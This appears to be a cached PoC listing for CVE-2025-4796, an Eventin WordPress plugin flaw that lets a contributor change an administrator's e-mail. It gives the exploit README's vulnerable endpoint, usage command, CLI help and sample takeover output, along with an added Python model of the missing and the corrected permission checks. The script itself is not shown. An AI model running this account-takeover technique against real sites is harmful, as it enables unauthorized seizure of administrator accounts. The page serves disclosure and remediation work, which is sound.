
PoC details: dfc3aea1844162212911a7caf3f59c702a816858

Source
Related vulnerability
Title: WordPress plugin Eventin security vulnerability (CVE-2025-4796)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that can be used to host a personal blog on a server running PHP and MySQL; a WordPress plugin is an add-on application for it. Eventin 4.0.34 and earlier contain a security vulnerability caused by failing to properly verify the caller's identity or capability, which can lead to privilege escalation.
Description
Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation via User Email Change/Account Takeover
Introduction
# CVE-2025-4796
Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation via User Email Change/Account Takeover

# 🛡️ Eventin <= 4.0.34 - Authenticated (Contributor+) Privilege Escalation (CVE-2025-4796)

## 📌 Overview
This repository documents a privilege escalation vulnerability in the Eventin WordPress plugin (<= 4.0.34) that allows an authenticated user with Contributor+ capabilities to change arbitrary users' email addresses via the plugin's speaker update API. By changing an administrator's email, an attacker can trigger a password reset and gain account takeover.

- Vulnerable component: Eventin WordPress plugin (Eventin\Speaker\Api\SpeakerController::update_item)
- Affected versions: <= 4.0.34
- CVE: CVE-2025-4796
- CVSS: 8.8 (High)
- Active installations: 10,000+

## ⚠️ Vulnerability Details
Eventin does not properly validate the identity or capability of the caller before updating speaker/user details (specifically email). An attacker who is authenticated as a contributor (or higher) can change the email address of other users — including administrators — using the plugin REST endpoint:
- PUT /wp-json/eventin/v2/speakers/<speaker_id>

Once the email is changed to an attacker-controlled address, the standard WordPress password reset flow can be used to take over the account.
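What the missing check looks like, and what a correct one has to enforce, as an added Python model written for this page (it is neither Eventin's PHP code nor the repository's script): the role-to-capability table, the speaker record and the in-memory store are constructed for illustration. The point it makes is that a valid X-WP-Nonce only proves the request came from a logged-in session; whether that session may rewrite speaker 9's e-mail is a separate authorization decision that must compare the caller with the speaker's owner and then check a user-edit capability, because the e-mail is a field of the linked account, not of the speaker post.

```python
"""Added example (not Eventin's code): a model of the authorisation a
WordPress REST permission_callback should enforce before a speaker update
touches the linked account's e-mail. Roles, capability sets, the speaker
record and the in-memory "database" are constructed for illustration."""
from dataclasses import dataclass

# Constructed subset of the WordPress role -> capability mapping.
ROLE_CAPS = {
    "administrator": {"edit_posts", "edit_others_posts", "edit_users"},
    "editor": {"edit_posts", "edit_others_posts"},
    "contributor": {"edit_posts"},
}


@dataclass
class User:
    id: int
    role: str
    email: str

    def can(self, capability: str) -> bool:
        return capability in ROLE_CAPS.get(self.role, set())


@dataclass
class Speaker:
    id: int
    author_id: int   # user who created the speaker post
    user_id: int     # WordPress account the speaker profile is linked to
    email: str


class Forbidden(Exception):
    """Stands in for a WP_Error carrying HTTP status 403."""


def update_speaker_unchecked(db, actor, speaker_id, fields):
    """Models the pre-fix behaviour: any logged-in caller may update any
    speaker, and the e-mail write is propagated to the linked user."""
    sp = db["speakers"][speaker_id]
    if "email" in fields:
        sp.email = fields["email"]
        db["users"][sp.user_id].email = fields["email"]
    return sp


def update_speaker_hardened(db, actor, speaker_id, fields):
    """Object-level check on the speaker post, plus a separate capability
    check for the account field (e-mail) the update would change."""
    sp = db["speakers"][speaker_id]
    if sp.author_id != actor.id and not actor.can("edit_others_posts"):
        raise Forbidden("not allowed to edit this speaker")
    new_email = fields.get("email")
    if new_email is not None and new_email != sp.email:
        # Changing another account's e-mail is a user edit, not a post edit.
        if sp.user_id != actor.id and not actor.can("edit_users"):
            raise Forbidden("not allowed to change another user's e-mail")
    return update_speaker_unchecked(db, actor, speaker_id, fields)


def make_db():
    """Constructed scenario matching the README: speaker 9 is the admin's."""
    admin = User(1, "administrator", "admin@example.com")
    contributor = User(7, "contributor", "contrib@example.com")
    return {
        "users": {u.id: u for u in (admin, contributor)},
        "speakers": {9: Speaker(9, author_id=1, user_id=1, email="admin@example.com")},
    }


def demo():
    """Outcome of the contributor's request against both handlers, plus an
    editor (owns nothing but may edit others' posts) and the admin's own edit."""
    attacker_email = "attacker@example.com"
    results = {}

    db = make_db()
    update_speaker_unchecked(db, db["users"][7], 9, {"email": attacker_email})
    results["unchecked_admin_email"] = db["users"][1].email  # reset link now goes to the attacker

    db = make_db()
    try:
        update_speaker_hardened(db, db["users"][7], 9, {"email": attacker_email})
        results["contributor"] = "allowed"
    except Forbidden as err:
        results["contributor"] = f"403 {err}"
    results["hardened_admin_email"] = db["users"][1].email  # unchanged

    db = make_db()
    editor = User(3, "editor", "editor@example.com")
    db["users"][3] = editor
    try:
        update_speaker_hardened(db, editor, 9, {"email": attacker_email})
        results["editor"] = "allowed"
    except Forbidden as err:
        results["editor"] = f"403 {err}"

    db = make_db()
    update_speaker_hardened(db, db["users"][1], 9, {"email": "new-admin@example.com"})
    results["admin_self_update"] = db["users"][1].email
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running it shows the contributor's request succeeding against the unchecked handler and being refused by the hardened one; the editor case is the reason for the second check, since the right to edit the speaker post is not the right to rewrite the e-mail of the account behind it.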

## 🧰 Script (PoC)
Filename: `CVE-2025-4796.py`

This script automates the steps:
1. Log in to the target WordPress site with the supplied credentials.
2. Extract the X-WP-Nonce that cookie-authenticated REST requests require.
3. Send a PUT request to `/wp-json/eventin/v2/speakers/<speaker_id>` to update the speaker's email.
4. Print the formatted JSON response and a success summary.

Requirements:
- Python 3.8+
- requests

Installation:
```sh
pip install requests
```

## 🚀 Usage
Run the script from the command line:

```sh
python CVE-2025-4796.py -u https://target.site -id 9 -email attacker@example.com -user contributor_user -pass contributor_password
```

Show script help:

```sh
python CVE-2025-4796.py -h
```

## 📝 CLI Options (help)
```sh
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD

Exploit For: CVE-2025-4796 By: Nxploited

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -id, --speaker_id SPEAKER_ID
                        Enter the speaker ID for the user
  -email, --email EMAIL
                        Enter a new email address
  -user, --username USERNAME
                        Enter the username for the account to upgrade
  -pass, --password PASSWORD
                        Enter the password for the account to upgrade
```
## ✅ Example Successful Output
```
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...

[+] Exploitation in progress, please wait ...

[+] Exploitation successful.
[+] The account has been updated to Admin.
    Speaker ID   : 9
    Email        : Nxploited@gmail.com

[!] Please reset your password using the email: Nxploited@gmail.com
```

## ⚖️ Responsible Disclosure & Disclaimer
- This repository is provided for security research, testing, and defensive purposes.
- Do not use these techniques against systems you do not own or do not have explicit authorization to test.
- Unauthorized exploitation of vulnerabilities is illegal and unethical.
- If you are a site owner and believe you are vulnerable, update Eventin to the latest version or apply vendor patches immediately.
- Use this code only in authorized environments (lab, client-approved pen test, or with explicit permission).

## 🧾 What the script does (concise)
- Validates inputs (URL, email) and normalizes the URL scheme.
- Disables SSL warnings (optional; used to support testing against self-signed dev instances).
- Logs in using provided WP credentials and validates login via cookies.
- Fetches X-WP-Nonce from the admin page.
- Sends an authenticated PUT request to update the speaker's email.
- Prints the formatted JSON response and a final human-readable success summary.

## 👤 Credits
By: Khaled Alenaz (Nxploited)  
GitHub: https://github.com/Nxploited/
File snapshot

```
[4.0K] /data/pocs/dfc3aea1844162212911a7caf3f59c702a816858
├── [8.7K] CVE-2025-4796.py
├── [1.5K] LICENSE
├── [4.2K] README.md
└── [ 9] requirements.txt

1 directory, 4 files
```
The Shenlong bot has cached this PoC for you.
Notes
    1. Accessing the original source is recommended.
    2. If the source is gone or unreachable, e-mail f.jinxu#gmail.com (replace # with @) to request the local snapshot.
    3. Shenlong has snapshotted the PoC code; to keep it maintained long-term, please consider paying or donating for the local PoC copy. Thank you for your support.